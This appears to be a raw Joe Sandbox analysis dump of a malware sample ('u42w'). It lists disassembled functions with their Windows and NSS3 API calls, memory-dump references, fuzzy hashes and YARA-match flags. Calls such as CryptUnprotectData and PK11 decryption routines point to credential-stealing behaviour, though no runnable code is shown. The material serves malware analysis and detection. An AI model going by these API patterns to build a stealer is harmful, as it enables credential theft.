                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                                                                              • Opcode ID: 5d6c9433502695ae6155da8a9ea400fa51681aeba1886d75d62a3ee1eb24ecbf
                                                                                                                                                                                                                              • Instruction ID: f39b75c06b128a3eb06ee8458674e90b6e6b82838fa4207a5152f6b28582d089
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d6c9433502695ae6155da8a9ea400fa51681aeba1886d75d62a3ee1eb24ecbf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D513B72B016494FC71CCDADDC526DABBDAABA4310F48C23AE442DB781D638D907C751
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA2C3A2,?,?,00000000,00000000), ref: 6CA0A528
                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0A6E0
                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0A71B
                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0A738
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA0A6CA
                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA0A6D9
                                                                                                                                                                                                                              • database corruption, xrefs: 6CA0A6D4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                              • API String ID: 622669576-598938438
                                                                                                                                                                                                                              • Opcode ID: 36e3a7e1f19d34615744baf5269004790c5ed09ae2abf754a6595fbcd9a435f6
                                                                                                                                                                                                                              • Instruction ID: 499b8fa8d95e04a0b76f9822a018aebb1e8e8f2a7463fbf4bfd2430a4d18ab7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e3a7e1f19d34615744baf5269004790c5ed09ae2abf754a6595fbcd9a435f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F91D1717083018BC714CF29D49066AB7F2BF48358F494A6DE8958BB91EB70ECC4CB82
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C964444
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C964466
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B1228
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C9B1238
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B124B
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B125D
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C9B126F
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C9B1280
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C9B128E
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C9B129A
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9B12A1
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C96447A
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C96448A
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964494
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 241050562-0
                                                                                                                                                                                                                              • Opcode ID: c6eb4c5c506eb523f6555e3cbef186ce5f5d11e130d5d74bb2e2551290495a12
                                                                                                                                                                                                                              • Instruction ID: 460683717e64be24ec36077f8a1ec2a257d9fca9bb22eb0d005d24913dd27224
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6eb4c5c506eb523f6555e3cbef186ce5f5d11e130d5d74bb2e2551290495a12
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C11A5B2D007059BE720CFA59C855A7B7F8FF6925CB044B2EE88D52A00F371F5988790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00418E46
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00418E89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                              • Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                              • Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,6C9C5A85), ref: 6C9E2675
                                                                                                                                                                                                                              • PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C9E2659
                                                                                                                                                                                                                                • Part of subcall function 6C993850: TlsGetValue.KERNEL32 ref: 6C99389F
                                                                                                                                                                                                                                • Part of subcall function 6C993850: EnterCriticalSection.KERNEL32(?), ref: 6C9938B3
                                                                                                                                                                                                                                • Part of subcall function 6C993850: PR_Unlock.NSS3(?), ref: 6C9938F1
                                                                                                                                                                                                                                • Part of subcall function 6C993850: TlsGetValue.KERNEL32 ref: 6C99390F
                                                                                                                                                                                                                                • Part of subcall function 6C993850: EnterCriticalSection.KERNEL32(?), ref: 6C993923
                                                                                                                                                                                                                                • Part of subcall function 6C993850: PR_Unlock.NSS3(?), ref: 6C993972
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9E2697
                                                                                                                                                                                                                              • PK11_Encrypt.NSS3(?,?,?,?,00000000,6C9C5A85,?,6C9C5A85), ref: 6C9E2717
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3114817199-0
                                                                                                                                                                                                                              • Opcode ID: fb3029a1f1e83e0ba28f84ae2676e541bff31eaa68a094e49989931e1acf387b
                                                                                                                                                                                                                              • Instruction ID: d10767bede4d9929be1ea73108bf02ae35b24b6c6074c09bf78201a09536e961
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb3029a1f1e83e0ba28f84ae2676e541bff31eaa68a094e49989931e1acf387b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC411A71A0C78266FB268E19CC85FDB73ACEFE8B14F104609E95406641EA71D58587D2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                              • Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • bind.WSOCK32(?,?,?,?,6C946401,?,?,0000001C), ref: 6C946422
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,6C946401,?,?,0000001C), ref: 6C946432
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastbind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2328862993-0
                                                                                                                                                                                                                              • Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                                                                                                                              • Instruction ID: 6248f800bb4da6f7785f1b58487d0bef8c2eb8b7934a5a686cffcea7c9ba353b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9E01D752501046FCF019F75DD0485A37D99F18228750C514F519C7F71E731D4D9D740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5f1701c7a243d89472ed8f80b757ee3218d3d604bb540d18be2c0f4ef33e6e86
                                                                                                                                                                                                                              • Instruction ID: 7c16a3c0758e4bea282c0e66d8a35689d2a84d94bc0cd5068dde994b42b19199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f1701c7a243d89472ed8f80b757ee3218d3d604bb540d18be2c0f4ef33e6e86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211CEB47043168FCB14DF28D890A6A7BB6FF85368F188479D8198B701DB35E846CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 4acdfae43af77f41eeadf045b2adebe8de865e0c01fc0a2422d6ee861eb58526
                                                                                                                                                                                                                              • Instruction ID: 2f424ddd2934ed9aa2c3f065501972980fc0d25f25b1a74cde00a21e898dfdd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4acdfae43af77f41eeadf045b2adebe8de865e0c01fc0a2422d6ee861eb58526
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B1109B6E002199F8B00CF99D8809EFBBF9EF8C664B554519ED18E7300D230ED158BE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: bf2b523420452fc4d8be04ec6e45aefb7778667f7e0110cc29bdc7bc3d8ee709
                                                                                                                                                                                                                              • Instruction ID: 7f5100f993dbdc288b75950ab7059814c5f04e3f49c71e59e77f00342ada4ee6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2b523420452fc4d8be04ec6e45aefb7778667f7e0110cc29bdc7bc3d8ee709
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A311C975A002199F9B00DF59D8809EFB7F9EF4C254B16416AED18E7301D630ED158BE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                              • Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C50
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C5B
                                                                                                                                                                                                                              • PR_smprintf.NSS3(6CA8AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C9A4F51,00000000), ref: 6C9B4C76
